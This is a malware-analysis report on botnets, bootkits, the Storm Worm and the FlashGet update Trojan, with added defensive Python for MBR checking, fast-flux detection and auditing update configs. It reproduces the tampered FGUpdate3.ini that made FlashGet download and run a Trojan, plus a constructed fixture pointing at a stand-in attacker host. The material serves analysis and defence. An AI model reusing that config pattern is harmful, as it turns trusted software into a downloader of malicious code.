A BotNet
Botnets have been in existence for about 10 years; experts have been warning the public about the threat posed by botnets for more or less the same period. Nevertheless, the scale of the problem caused by botnets is still underrated and many users have little understanding of the real threat posed by zombie networks (that is, until their ISP disconnects them from the Internet, or money is stolen from their credit cards, or their email or IM account is hijacked).
A botnet is a network of computers which are infected with a malicious program that enables cybercriminals to remotely control infected computers. Malicious programs that are designed specifically for use in creating botnets are called bots.
Botnets have vast computing power. They are used as a powerful cyber weapon and are an effective tool for making money illegally. The owner of a botnet can control the computers which form the network from anywhere in the world – from another city, country or even another continent. Importantly, the Internet is structured in such a way that a botnet can be controlled anonymously.
The owner of an infected machine usually does not even suspect that the computer is being used by cybercriminals. Most zombie machines are home users’ PCs.
Botnets can be used by cybercriminals for conducting a broad range of malicious activities, from sending spam to attacking government networks.
Sending spam. This is the most common use for botnets, and is also one of the simplest. Experts estimate that over 80% of spam is sent from zombie computers. It should be noted that spam is not always sent by botnet owners: botnets are often rented by spammers.
According to our data, an average spammer makes $50,000 – $100,000 a year. Botnets made up of thousands of computers allow spammers to send millions of messages from infected machines within a very short space of time.
Blackmail. The second most popular method of making money via botnets is to use tens or even hundreds of thousands of computers to conduct DDoS (Distributed Denial of Service) attacks. This involves sending a stream of false requests from bot-infected machines to the web server under attack. As a result, the server will be overloaded and consequently unavailable. As a rule, cybercriminals demand payment from the server’s owner in return for stopping the attack.
Today, many companies work exclusively on the Internet. Downed servers bring business to a halt, resulting in financial losses. To return stability to servers as soon as possible, such companies are more likely to give in to blackmail than ask the police for help. This is exactly what cybercriminals are counting on, and DDoS attacks are becoming increasingly common.
DDoS attacks can also be used as a political tool. In such cases, attacks usually target servers belonging to government organizations. What makes such attacks particularly dangerous is that they can be used as provocation, with a cyber attack on one country being conducted from servers in another country and controlled from a third country.
Anonymous Internet access. Cybercriminals can access web servers using zombie machines and commit cybercrimes such as hacking websites or transferring stolen money. This activity, of course, appears to come from the infected machines.
Selling and leasing botnets. One option for making money illegally using botnets is based on leasing them or selling entire networks. Creating botnets for sale is also a lucrative criminal business.
Phishing. Addresses of phishing pages are often blacklisted soon after they appear. A botnet allows phishers to change the addresses of phishing pages frequently, using infected computers as proxy servers. This helps conceal the real address of the phishers' web server.
Theft of confidential data. This type of criminal activity will probably never lose its attraction for cybercriminals. Botnets help increase the haul of passwords (passwords to email and ICQ accounts, FTP resources, web services etc.) and other confidential user data by a factor of a thousand. A bot used to create a zombie network can download another malicious program, e.g., a password stealing (PSW) Trojan, and infect all the computers on the botnet with it, providing cybercriminals with passwords from all the infected computers. Stolen passwords are sold or used for mass infections of web pages (in the case of FTP account passwords) in order to further spread the bot program and expand the zombie network.
The botnet business
The answer to the question why botnets keep evolving and why they are coming to pose an increasingly serious threat lies in the underground market that has sprung up around them. Today, cybercriminals need neither specialized knowledge nor large amounts of money to get access to a botnet. The underground botnet industry provides everyone who wants to use a botnet with everything they need, including software, ready-to-use zombie networks and anonymous hosting services, at low prices.
The first thing needed to create a botnet is a bot, i.e. a program that can remotely perform certain actions on a user’s computer without the user’s knowledge. Software for creating botnets can be easily purchased on the Internet by simply finding an appropriate advertisement and contacting the advertiser.
A simple web-oriented botnet requires a hosting site where a command and control center can be located. Such sites are readily available, and come complete with support and anonymous access to the server (providers of anonymous hosting services usually guarantee that log files will not be accessible to anybody, including law enforcement agencies). Advertisements like the one shown below are abundant on the Internet.
When a C&C site has been created, what’s needed next are computers infected by a bot. One option is to buy a ready-made network with somebody else’s bot installed. Since stealing botnets is a common practice, most buyers prefer to replace both the malicious programs and the command and control centers with their own, thereby gaining guaranteed control over the botnet.
Conclusion
Today, botnets are among the main sources of illegal income on the Internet and they are powerful weapons in the hands of cybercriminals. It is totally unrealistic to expect that criminals will relinquish such an effective tool. Security experts view the future with some trepidation as they anticipate the continued development of botnet technologies.
It may not only be cybercriminals who have an interest in creating international botnets. Such botnets can be used by governments or individuals to exert political pressure in tense situations. In addition, anonymous control of infected machines that does not depend on their geographic location could be used to provoke cyber conflicts. All this takes is organizing a cyber attack on one country’s servers from computers located in another country.
Networks which unite the resources of tens or hundreds of thousands or even millions of infected computers have the potential to be extremely dangerous – a potential which (luckily!) has not yet been fully exploited. Virtually all this cyber power stems from infected home computers, which make up the overwhelming majority of zombie machines exploited by cybercriminals.
Our annual report on malware evolution in 2007, published a few months ago, contained forecasts on how the threat landscape would evolve in 2008. Now that the first three months of the year have passed, we can start to draw some preliminary conclusions.
Unfortunately, as often happens in the antivirus industry, the conclusions are fairly discouraging. The speed at which the number of malicious programs is rising continues to increase, with thousands of new variants being detected every day. This is starting to be accompanied by increased technical sophistication, and we are also seeing a shift in attack vectors, with malicious users starting to direct their attention to less well protected fields, such as Web 2.0 technologies and mobile devices.
We continue to see the reincarnation of old ideas and techniques, and their implementation at new levels raises the level of threat. Examples are infecting boot sectors on victim machines, spreading malicious programs via storage media, and infecting files.
It looks as though the first quarter of 2008 brought the symbolic, but irrevocable death of the old school of virus writing. At the end of February, the site of the legendary 29A group officially announced that the group would cease to exist.
The people who had created "Cap" (the first macro virus to cause a global epidemic), "Stream" (the first virus for additional NTFS streams), "Donut" (the first virus for the .NET platform), "Rugrat" (the first virus for the Win64 platform), the mobile viruses Cabir and Duts and many others, have now retreated, under pressure from the increased criminalization of the world of virus writers. No one creates malicious programs to express themselves, assert their personality or for research purposes anymore – it's far more profitable to generate hundreds of primitive Trojan programs and then sell them.
The death of 29A was commented on by nearly all the major antivirus companies: each company threw a virtual clod of earth on the grave of the group which in its time created many difficulties for virus analysts. So it's fitting that we should also mention the event.
As for what came to replace the 'romantic' ideal of virus writing in 2008, this is discussed in the following chapters:
Bootkit
The storm continues
TrojanGet
Some sociable worms
Mobile news
Bootkit
Bootkit rootkits – rootkits with the ability to boot from the boot sector of any device – became, de facto, the main problem for the antivirus industry at the start of 2008. Although the efforts made to combat this problem, and the seriousness of the issue may not have been obvious to the public at large, it may be that the subject will come to cause problems for everyone in the near future.
The story begins
It all started in November 2007, or perhaps, more correctly, in 2005. However, this isn't totally correct either. Let's take a quick trip into the past and recall what took place 22 years ago, in 1986.
This is how the events of that year are described in the Virus Encyclopaedia on viruslist.com (http://www.viruslist.com/en/viruses/encyclopedia?chapter=153311030):
The first global IBM-compatible virus epidemic was detected. Brain, which infected the boot sector, was able to spread practically worldwide within a few months. The almost total lack of awareness in the computing community of how to protect machines against viruses ensured Brain's success. In fact, the appearance of numerous science fiction works on the topic only strengthened the panic, instead of teaching people about security.
The Brain virus was written by a 19-year-old Pakistani programmer, Basit Farooq Alvi, and his brother Amjad, and included a text string containing their names, address and telephone number. According to the virus's authors, who worked in sales for a software company, they wanted to gauge the level of piracy in their country. Aside from infecting a disk's boot sector and changing the disk name to '© Brain', the virus did nothing; it had no real payload, and did not corrupt data. Unfortunately, the brothers lost control of their so-called experiment and Brain spread worldwide.
Interestingly enough, Brain was also the first 'stealth virus.' When an attempt to read the infected sector was detected, the virus would display the original, uninfected data.
So this was the start of the story. For more than 10 years, boot viruses were one of the most widespread types of malicious programs.
The principle on which these viruses work is relatively simple: they use the sequence which launches the operating system when the computer is switched on or rebooted. The system boot program reads the first physical sector of the boot disk (A:, C:, or the CD-ROM drive, depending on BIOS Setup parameters) and passes control to it. If there is a virus in the boot sector, the virus gains control.
There's only one method known which is used to infect floppies: the virus replaces the original boot sector code on the disk with its own code. The hard drive can be infected in three different ways – the virus either replaces the MBR code with its own code; replaces the boot sector code on the boot disk (usually C:) with its own code, or modifies the address of the active boot sector in the Disk Partition Table located on the hard drive MBR.
In the majority of cases, when infecting the disk the virus moves the original boot sector (or the MBR) to another disk sector (for instance, to the first free sector).
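As an added illustration (not code from the original article), the following Python reads a 512-byte MBR, parses its partition table and compares it with a known-good baseline, which is how the first and third infection methods above show up on disk. The sample images, baseline hash and expected partition start are all constructed; a real check should read the sector from a clean boot medium, since an infected system can present a clean sector when asked.

```python
# Added example (not code from the original article): parse a 512-byte MBR
# and check it for the infection methods described above. All sample
# images, the baseline hash and the expected partition start are constructed.
import hashlib
import struct

SECTOR_SIZE = 512
PART_TABLE_OFFSET = 446          # boot code occupies bytes 0..445
BOOT_SIGNATURE = b"\x55\xAA"     # last two bytes of a valid MBR


def build_mbr(boot_code, entries):
    """Assemble a 512-byte MBR from boot code and up to four
    (active, type, lba_start, sectors) tuples. Used only to construct samples."""
    code = boot_code.ljust(PART_TABLE_OFFSET, b"\x00")[:PART_TABLE_OFFSET]
    table = b"".join(
        struct.pack("<B3xB3xII", 0x80 if active else 0x00, ptype, lba, sectors)
        for active, ptype, lba, sectors in entries
    ).ljust(64, b"\x00")
    return code + table + BOOT_SIGNATURE


def parse_partition_table(mbr):
    """Return the four 16-byte partition entries as dicts (CHS fields skipped)."""
    if len(mbr) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly 512 bytes")
    entries = []
    for i in range(4):
        status, ptype, lba, sectors = struct.unpack_from(
            "<B3xB3xII", mbr, PART_TABLE_OFFSET + 16 * i)
        entries.append({"index": i, "active": status == 0x80, "type": ptype,
                        "lba_start": lba, "sectors": sectors})
    return entries


def check_mbr(mbr, baseline_code_sha256, expected_active_lba):
    """Compare an MBR against a known-good baseline and return a list of findings.

    Detects replaced boot code (method 1) and a redirected active-partition
    pointer (method 3). Method 2, a replaced partition boot sector, needs the
    same hash comparison applied to the sector at the active partition's start.
    """
    findings = []
    if mbr[-2:] != BOOT_SIGNATURE:
        findings.append("boot signature 0x55AA missing: not a valid MBR")
    if hashlib.sha256(mbr[:PART_TABLE_OFFSET]).hexdigest() != baseline_code_sha256:
        findings.append("MBR boot code differs from baseline (code replaced?)")
    active = [e for e in parse_partition_table(mbr) if e["active"]]
    if len(active) != 1:
        findings.append(f"{len(active)} active partitions, expected exactly 1")
    elif active[0]["lba_start"] != expected_active_lba:
        findings.append(f"active partition start moved from LBA "
                        f"{expected_active_lba} to {active[0]['lba_start']}")
    return findings


# Constructed sample images (stand-ins for real boot code, not real malware).
CLEAN_CODE = bytes(range(256)) * 2
CLEAN_ENTRIES = [(True, 0x07, 2048, 1_000_000)]
CLEAN_MBR = build_mbr(CLEAN_CODE, CLEAN_ENTRIES)
BASELINE_HASH = hashlib.sha256(CLEAN_MBR[:PART_TABLE_OFFSET]).hexdigest()
# Method 1: the boot code has been overwritten.
MBR_CODE_REPLACED = build_mbr(b"\x90" * PART_TABLE_OFFSET, CLEAN_ENTRIES)
# Method 3: the active partition pointer now points at a different sector.
MBR_POINTER_MOVED = build_mbr(CLEAN_CODE, [(True, 0x07, 63, 1_000_000)])

if __name__ == "__main__":
    for label, image in [("clean", CLEAN_MBR), ("code replaced", MBR_CODE_REPLACED),
                         ("pointer moved", MBR_POINTER_MOVED)]:
        print(label, check_mbr(image, BASELINE_HASH, 2048) or ["no findings"])
```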
Developers started adding protection to prevent the MBR from being written to. Windows 95/98 appeared, floppies started to disappear from use, and after almost a decade, boot sector viruses faded from the landscape, becoming part of the history of virology.
However, at Black Hat USA in 2005, Derek Soeder and Ryan Permeh, two researchers from eEye Digital Security, presented BootRoot. This technology made it possible to place code on the boot sector of the disk – code that would intercept the booting of the Windows kernel and launch a backdoor, making it possible to remotely administer the machine via the local network.
This work attracted a certain amount of attention, and it was soon emulated. In January 2006, John Hesman from Next-Generation Security Software announced that functions for managing the electricity supply of the computer (the so-called ACPI – Advanced Configuration and Power Interface) make it possible to create programs which implement rootkit functions that can be saved to the BIOS flash memory. Malicious code saved in this location (BIOS) is more difficult to detect than in the case of the boot backdoor. Hesman also created prototype code which makes it possible to increase system privileges and read data from the computer memory.
A year later, at the end of 2007, two Indian programmers called Nitin and Vipin Kumar presented Vbootkit – a rootkit with a function making it capable of launching from the boot sector of any device. The program can also run on Windows Vista. The source code was not made public, but was passed to some antivirus companies.
The main principle behind Vbootkit is shown below:
BIOS --> Vbootkit code (from CD, PXE etc.) --> MBR --> NT Boot sector --> Windows Boot manager --> Windows Loader --> Vista Kernel.
The authors promised to implement BIOS infection in the next version of the bootkit.
In other words, what came to pass was no surprise – old technology for infecting the boot sector was combined with the fashion for rootkits. In spite of the fact that nearly all antivirus companies today are able to scan the boot sector of disks, it's still difficult to detect if system functions have been intercepted or substituted. And this is true even in the case of a Trojan and an antivirus running on one operating system, without even addressing a backdoor which starts before the operating system has launched.
All of the above seems like a potentially explosive mixture that could go up at any moment. And the explosion came in November 2007, although news of this came slightly later, at the end of December, when several thousand users (there is no exact data on the number of infections) came under attack from the first malicious implementation of a bootkit.
The bootkit
Between the 19th and the 28th December several websites appeared which used drive-by downloads (infecting a victim machine by placing exploits on a web site which then download a malicious program). A detailed analysis of the malicious program revealed code able to infect the MBR and hard disk sectors.
Once on the victim machine, the malicious code modifies the MBR, writes the rootkit part to a disk sector, extracts a Windows backdoor from itself, installs the backdoor, and then deletes itself.
The instructions written to the infected MBR pass control to the main part of the rootkit, which is placed on several hard disk sectors and is not represented as files in the system. This part monitors the Windows operating system once it has loaded and, when the disk is read, hides the infected MBR and the "dirty" sectors by presenting clean ones instead. It does this by intercepting and substituting system functions.
In addition to hiding its presence in the system, the malicious code installs a backdoor in Windows; the backdoor steals user data, including user data for a range of online banking systems.
A reconstruction of events based on the variants of the rootkits detected, analysis of the infected sites and the code of the malicious program downloaded from these sites showed that from November 2007, the unknown authors had been preparing to launch their code on the world. Several of the first variants of this malicious program date from mid-November to mid-December; these are effectively alpha versions which contain serious errors in the code, and indicate that the authors were searching for optimal variants.
The code released at the end of December was already relatively effective. We classified the malicious program, which combined the functions of a bootkit and a backdoor, as Backdoor.Win32.Sinowal. This was because many of the functions in the backdoor, and also the method used to 'litter' code were identical to those which we are familiar with in Trojan-PSW.Win32.Sinowal.
In spite of increased sophistication and the many innovations implemented in the bootkit, it's only able to protect itself – this leaves the backdoor file open to being detected and deleted. This indicates that different people were involved in developing the bootkit and the backdoor, and there are a number of reasons to suggest that the bootkit was created by virus writers from Russia. There are well known cases in which virus writers have worked together. However, the result in this case suggests a warrior who has been hastily dressed in another's reforged armour which is, effectively, useless.
Nevertheless, the bootkit appears to be a self-sufficient platform – something that could be added to any existing malicious program in order to protect that program and mask its presence in the system. It may be that bootkits for sale will appear in the near future, making the technology available to thousands of script kiddies. Taking into account the rate at which the number of malicious programs is increasing, this could become one of the most widespread threats.
Protecting against bootkits: the problems
Why is it so difficult to protect against bootkits? The main problems are as follows:
1. The malicious code gains control before the operating system starts, and, consequently, before the antivirus program starts
2. It's difficult to detect the interception of functions from within an infected operating system
3. Restoring intercepted functions can lead to the entire operating system crashing
4. Curing the MBR is only possible if the original MBR can be detected
Of course, the best protection is to prevent the system from getting infected in the first place – after all, a bootkit doesn't materialize out of thin air. It has to get onto the computer somehow. Some antivirus programs are able to prevent infection even by unknown variants of malicious programs. However, there is always the possibility that such protection can be penetrated, and this raises the question of how to disinfect an already infected machine.
Here there are two options – either an antivirus is already installed on the system (in such cases, the four points mentioned above relate to the antivirus solution) or there is no antivirus, and one needs to be installed. In the second case, we encounter an additional problem related to that in point 1; the malicious code can block attempts to install an antivirus solution on the infected system.
Virus writers have analysed how antivirus companies solve the problems listed above, and in February 2008, a new improved version of the bootkit was released. All the methods previously implemented to combat bootkits turned out to be useless.
At the same time, the bootkit started spreading in new ways. Links to sites containing exploits which would install the bootkit were discovered on a number of European sites which had been hacked.
So far, apart from Sinowal, we haven't detected any other malicious programs which come equipped with a bootkit. At the moment, the standoff between antivirus companies and virus writers is following the classic path of attack and counter-attack. Even the latest variants of the bootkit can be combated without significant innovations in antivirus solutions.
However, looking a couple of steps down the line, it's clear that sooner or later only one method will guarantee that such malicious programs can be detected and deleted. This will entail a shift from software protection to hardware protection.
The key question is what gains control first – if it's the virus, then an antivirus will, a priori, be useless.
So, viruses have (again) reached the MBR. 10 years ago we solved this problem by using a boot disk equipped with an antivirus. It may be that the time is coming when we'll see the return of not just old virus technologies, but old antivirus technologies as well.
The storm continues
Mid January 2008 marked the first anniversary of the appearance of the first samples of what would become known, variously, as Zhelatin, Nuwar or the Storm Worm. Until then, computer virology had not encountered such a vigorously and variedly evolving malicious program.
Zhelatin continued to use and develop the concepts which had been implemented in the Bagle and Warezov worms. Zhelatin took its modular structure from Bagle, and copied Warezov in the frequent release of new variants. It also resembled Warezov in moving away from mass-mailing the main component via email, instead using hundreds of infected sites as well as Skype and IM to spread the malicious code. Added to all of this were social engineering tricks, rootkit technologies, methods for launching counter attacks on antivirus companies, and a decentralized botnet. In less than a year, the Storm Worm became the information security industry's main problem, due to its almost mythical botnet.
The exact dimensions of the Storm botnet remain a mystery. In 2007 we heard a widely varying range of estimates of the number of infected machines, and these estimates were all voiced around the same time. For instance, in September some experts estimated that the botnet had 2 million machines; others put the figure at between 250,000 and a million, while a third group believed the size to be 150,000 machines. There were even those who talked of 50 million infected computers! The reason for such a wide variety of figures is clear – because of the decentralized nature of the botnet, it's impossible to establish the exact number of zombie machines. Estimates can only be made based on indirect indicators, which are of course debatable.
Whichever way you look at it, the Storm botnet did exist. However, it was inactive. There was no 'classic' botnet activity detected; it wasn't used for mass mailings, or to conduct DDoS attacks (which, incidentally, doesn't rule out the botnet having been created by cybercriminals for criminal use). This left the impression that the botnet didn't perform any function apart from spreading the Storm worm itself (it did this by sending new messages containing links to infected sites and then placing modules on the infected machines which would then be downloaded onto new victim machines). It really wasn't clear why the botnet had been created: simply for the sake of it? But that doesn't happen – botnets take far too many resources to create and maintain.
Around October 2007, the frequency of mass mailings conducted by Zhelatin started to decline somewhat. Experts who had previously talked about millions of infected machines started to drop their estimates of the size of the botnet to between 150,000 and 200,000 computers. The suspicion emerged that the botnet was being prepared to be sold on in sections. Around the same time, the first mass mailings of spam from computers infected with the Storm Worm were detected. However, it couldn't be stated conclusively that spam was being sent via the botnet, rather than via other malicious programs which might also be located on the victim machines.
The end of 2007 and the early months of 2008 provided an answer to the question of what was happening with the Storm Worm.
At Christmas, the worm reappeared. The botnet started sending out millions of messages with titles such as "Find Some Christmas Tail", "Warm up this Christmas" and "Mrs. Clause Is Out Tonight!". The messages were designed to entice the user to a site called merrychristmasdude.com, which contained exploits that would conduct a drive-by download to get the Storm Worm onto victim machines. In actual fact, merrychristmasdude.com wasn't a single site which could have been closed down in order to prevent infection. Zhelatin used fast-flux, a technique for changing DNS addresses which constantly modifies the location of the site between more than a thousand deliberately prepared computers.
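To make the fast-flux mechanism concrete, here is an added Python example (not from the original article) that summarizes A-record churn per hostname from constructed DNS observations and flags names that resolve to many addresses across many networks with short TTLs; the thresholds are assumptions, not a published standard.

```python
# Added example (not code from the original article): a simple heuristic for
# spotting fast-flux hostnames in passive-DNS style records. The observations
# below are constructed; the thresholds are assumptions.
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_network


@dataclass(frozen=True)
class DnsObservation:
    ts: int          # time of the lookup (seconds since epoch, constructed)
    name: str        # queried hostname
    ttl: int         # TTL returned with the A records
    answers: tuple   # A records returned by this lookup


def analyze(observations, min_ips=10, min_nets=5, max_ttl=300):
    """Summarize A-record churn per hostname and flag likely fast-flux names.

    A fast-flux site, as described above, rotates through many unrelated
    infected hosts, so one name resolves to many IPs across many networks
    with a short TTL. A stable site keeps a few IPs and a long TTL.
    """
    stats = defaultdict(lambda: {"ips": set(), "nets": set(), "ttls": [], "lookups": 0})
    for obs in observations:
        s = stats[obs.name]
        s["lookups"] += 1
        s["ttls"].append(obs.ttl)
        for ip in obs.answers:
            s["ips"].add(ip)
            s["nets"].add(ip_network(f"{ip}/24", strict=False))
    report = {}
    for name, s in stats.items():
        report[name] = {
            "lookups": s["lookups"],
            "distinct_ips": len(s["ips"]),
            "distinct_nets": len(s["nets"]),
            "min_ttl": min(s["ttls"]),
            "fast_flux": (len(s["ips"]) >= min_ips
                          and len(s["nets"]) >= min_nets
                          and min(s["ttls"]) <= max_ttl),
        }
    return report


# Constructed observations: six lookups of each name, one minute apart.
# The flux name returns five fresh addresses from different /24s every time
# (10.x.x.x addresses are placeholders); the stable name always returns the same two.
FLUX_LOOKUPS = [
    DnsObservation(1_200_000_000 + 60 * i, "merrychristmasdude.com", 60,
                   tuple(f"10.{i}.{j}.{7 + i}" for j in range(5)))
    for i in range(6)
]
STABLE_LOOKUPS = [
    DnsObservation(1_200_000_000 + 60 * i, "example.org", 3600,
                   ("192.0.2.10", "192.0.2.11"))
    for i in range(6)
]

if __name__ == "__main__":
    for name, r in analyze(FLUX_LOOKUPS + STABLE_LOOKUPS).items():
        print(f"{name:25} ips={r['distinct_ips']:3} nets={r['distinct_nets']:3} "
              f"ttl={r['min_ttl']:5} fast_flux={r['fast_flux']}")
```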
Similar attacks, with only slight variations, carried on over the next few days, up until 15th January, when something strange happened. Either it was a joke on the part of the authors, or they simply made a mistake; whatever the case, the botnet started sending out messages containing Valentine's cards, even though Valentine's Day was still a month off.
The messages had titles such as "Sent with Love", "Our Love is Strong", "Your Love Has Opened" and so on. Naturally, the messages led the user to the fast-flux site currently being used.
The mass mailings in January turned out to be on a larger scale and also more intrusive than those which were conducted in the second half of 2007. They were also the largest mass mailings carried out in the first quarter of 2008. The authors of Zhelatin had struck a series of blows to either return the botnet to its original size or perhaps even to enlarge it. Computers infected by Zhelatin started to participate in DoS attacks, and MessageLabs started estimating that the Storm botnet was behind almost 20% of spam currently being sent out.
At approximately the same time Fortinet announced it believed the botnet was part of phishing attacks launched against the Barclays and Halifax banks. If this is the case, then it is the first time the Storm botnet has been directly used for classic cybercrime aims.
At the same time as the Storm Worm increased its activity, talk turned to the need to catch and sentence its authors. However, experts couldn't agree on even the nationality of those behind the worm, never mind naming names.
At the moment, there are two prevailing points of view. Dmitry Alperovitch from Secure Computing believes that a Russian is responsible, even going so far as to point to a location in St. Petersburg. He draws parallels with the notorious Russian Business Network (RBN) and the authors of the exploit bundle Mpack. Many experts support the view of the worm's Russian origins.
Others believe that the Storm Worm has been created by Americans. This argument is supported by the fact that the authors, in their use of social engineering tactics, demonstrate a suspiciously good knowledge of American life and psychology. The mass mailings play on specific incidents and events which will be of particular interest to the American public. And these events could well be unknown to virus writers from other countries, and particularly those from Russia.
We do not have any information which supports one point of view or the other. It seems to us that one of the most likely scenarios is that an international group which has clearly defined responsibilities lies behind this activity. Someone creates the worm; someone else is responsible for mass mailings; someone else places the worm on the infected sites; someone else hacks the sites; someone else is responsible for spreading the malicious program via instant messaging, and finally, yet another person is responsible for creating the exploits.
The widespread nature of the Storm Worm and the attack vectors which are being used are far too extensive to be within the capabilities of one, two or three people. If our suppositions are correct, then the Storm Worm is a textbook example of modern cybercrime and its international distribution of labour. It is of course true that it is still unclear how the cybercriminals are making money using the Storm Worm.
While we were still looking for the answers to the questions raised by the Storm Worm, at the end of March its authors sent out the latest flood of messages. The occasion – April 1st, known throughout the US, Europe and Russia as April Fool's Day.
The question remains: who will have the last laugh?
TrojanGet
Although incidents in which legitimate programs and software companies spread infection are relatively rare, they do exist in the information security world. Past cases have ranged from infected distributions to infected document files being sent to clients and partners.
Every incident of this nature has a significant effect on the reputation either of the software or of the company concerned. They affect users who do observe the basic rules of computer security and cause problems for antivirus companies who view legitimate software and the sources it stems from as trustworthy.
The first quarter of 2008 brought the latest case of this type.
At the beginning of March, Kaspersky Lab analysts received messages from users saying that a Trojan was present in the directory of the popular download client FlashGet. Analysis showed that the problem affected users throughout the world. The symptoms of infection were the appearance of files called inapp4.exe, inapp5.exe and inapp6.exe in the system. Kaspersky Anti-Virus detected these files as Trojan-Dropper.Win32.Agent.exo, Trojan-Dropper.Win32.Agent.ezo and Trojan-Downloader.Win32.Agent.kht.
It was a strange situation: no other Trojan program which could have got this Trojan onto the system was detected. Some of the victims had fully patched operating systems and browsers. So how could these malicious programs have penetrated the infected machines?
What attracted our attention straight away was the location of the Trojans – in the FlashGet directory itself. A quick check showed that apart from the presence of the Trojan files, the FGUpdate3.ini file had recently been created and modified (in the original article, the lines which differ from the original file were highlighted in blue):
[Add]
fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020
inapp4.exe=1.0.0.1031
[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif]
url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%
[inapp4.exe]
url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%
The link to inapp4.exe (the Trojan file) led to the genuine FlashGet site: the Trojan would download from the site in the form of a file called appA.cab.
There wasn't any information about the incident on the FlashGet site, and a look at the user forum returned a lot of messages, both about infections and about the fact that the developers were remaining silent on the matter.
Information found on the Internet showed that the first cases of infection had been detected back on 29th February. The most recent infection that we knew of at that time had been on 9th March. For ten days, a legitimate program had been acting as a Trojan downloader program, installing and launching Trojan programs placed on the developers' site on victim machines.
It might have seemed that the incident was over – when we published information about this case, the Trojans had already been deleted from the site, and the FGUpdate3.ini file (which is also downloaded from the Internet) had been reverted to its original condition. However, in less than two weeks, on 22nd March, Steve Bass, the editor of the popular publication PC World, detected Trojan-Downloader.Win32.Agent.kht in his FlashGet directory. It looked as though history was repeating itself – both the FlashGet site and the program itself were once again spreading malicious code.
We can see two ways in which FlashGet could be transformed into a Trojan downloader program.
The first is the most obvious explanation: the site itself was hacked. As a result, a malicious user would be able to replace the standard configuration file with one that points to a Trojan placed on the same site. We don't know why the hackers didn't use a different site; it may be that they worked on the principle that hiding in plain sight (a link to a file on the FlashGet site in the FlashGet configuration file would not raise suspicions) was the best disguise.
We decided to check if it would be possible to use this trick to download any other files from any other sites. The answer: yes. All you need to do is add a link to the FGUpdate3.ini file. And that link can lead to anything, which will then be automatically downloaded and launched on your computer each time FlashGet is launched. Even if you don't press "Refresh", FlashGet will independently use the information from the .ini file.
The 'vulnerability' is present in all versions of FlashGet 1.9.xx. This means that even though the hack of the FlashGet site has been fixed, the weakness on the user's system remains: any Trojan program can modify the local FlashGet .ini file, turning the program into a Trojan downloader. This is the second of the two methods mentioned above.
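To make the point concrete, here is an added example (not code from the original article, nor FlashGet's own update logic) that audits an FGUpdate3.ini of the layout shown above. It assumes only what the file itself reveals: an [Add] section naming the files to fetch, and a per-file section carrying url=, flag= and path=. The meaning of the flag values is not documented here, so the script does not interpret them; the trusted-host list and the second, tampered sample are assumptions constructed for the example.

```python
"""Audit a FlashGet-style FGUpdate3.ini for entries that would make the
program download and run arbitrary files.

Added example, not code from the article or from FlashGet. It assumes the
layout visible in the article: an [Add] section listing file=version, and
one section per file carrying url=, flag= and path=. The flag semantics are
not documented on the page, so they are reported but not interpreted.
"""
import configparser
from urllib.parse import urlparse

# Constructed sample: the modified file reproduced from the article.
SAMPLE_INI = """\
[Add]
fgres1.ini=1.0.0.1035
FlashGet_LOGO.gif=1.0.0.1020
inapp4.exe=1.0.0.1031
[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[FlashGet_LOGO.gif]
url=http://dl.flashget.com/flashget/FlashGet_LOGO.cab
flag=16
path=%product%
[inapp4.exe]
url=http://dl.flashget.com/flashget/appA.cab
flag=2
path=%product%
"""

# Constructed sample: a locally edited .ini pointing at an attacker host
# (example.net is a reserved documentation domain; the entry is invented).
TAMPERED_INI = """\
[Add]
fgres1.ini=1.0.0.1035
update.exe=1.0.0.1
[AddEx]
[fgres1.ini]
url=http://dl.flashget.com/flashget/fgres1.cab
flag=16
path=%product%
[update.exe]
url=http://example.net/update.cab
flag=2
path=%product%
"""

# Assumption: the vendor's genuine download host is the only one expected.
TRUSTED_HOSTS = {"dl.flashget.com"}
# File types that run as code once dropped into the program directory.
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".pif")


def parse_update_ini(text):
    """Return {name: {"version", "url", "flag", "path"}} for every [Add] entry."""
    cp = configparser.ConfigParser(interpolation=None)  # keep %product% literal
    cp.optionxform = str                                 # keep key case (FlashGet_LOGO.gif)
    cp.read_string(text)
    entries = {}
    if not cp.has_section("Add"):
        return entries
    for name, version in cp["Add"].items():
        sect = dict(cp[name]) if cp.has_section(name) else {}
        entries[name] = {"version": version, "url": sect.get("url"),
                         "flag": sect.get("flag"), "path": sect.get("path")}
    return entries


def audit(entries):
    """Return (name, reason) pairs for entries a defender should review."""
    findings = []
    for name, e in entries.items():
        reasons = []
        if name.lower().endswith(EXECUTABLE_EXT):
            reasons.append("executable dropped into %s" % (e["path"] or "?"))
        host = urlparse(e["url"] or "").hostname
        if host is None:
            reasons.append("no download URL")
        elif host not in TRUSTED_HOSTS:
            reasons.append("untrusted host %s" % host)
        findings.extend((name, r) for r in reasons)
    return findings


if __name__ == "__main__":
    for label, ini in (("article sample", SAMPLE_INI), ("tampered", TAMPERED_INI)):
        print(label, audit(parse_update_ini(ini)))
```

The inapp4.exe entry is flagged even though it points at the genuine vendor host, and that is the point: nothing in the file authenticates what is fetched (no hash, no signature), so from the program's perspective a compromised site and a locally edited .ini are the same thing.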
It hardly needs stressing that FlashGet is usually treated as a trusted application, so any network activity it generates, and any site it contacts, is seen as legitimate.
There has, to date, been no official reaction from the Chinese company which develops FlashGet. The true cause of the incident remains unknown, and there is no guarantee that it will not happen again. You can draw your own conclusions…
Antivirus companies retain the right to decide whether or not FlashGet is potentially malicious, and have started to classify it as Riskware. There are more than enough grounds for doing so.
Some sociable worms
We wrote about the danger caused by social networking sites in our annual report. We forecast that in 2008 users of social networking sites will become the main targets for phishing attacks. There will start to be increased demand among malicious users for account data to services such as Facebook, MySpace, LiveJournal, Blogger and others. This will become a dangerous alternative to placing malicious programs on hacked sites. In 2008, many Trojan programs will spread via user accounts on social networking sites, on their blogs and on their profiles.
February 2008 met these expectations in full. Once again Orkut, the popular social networking site owned by Google, came under attack.
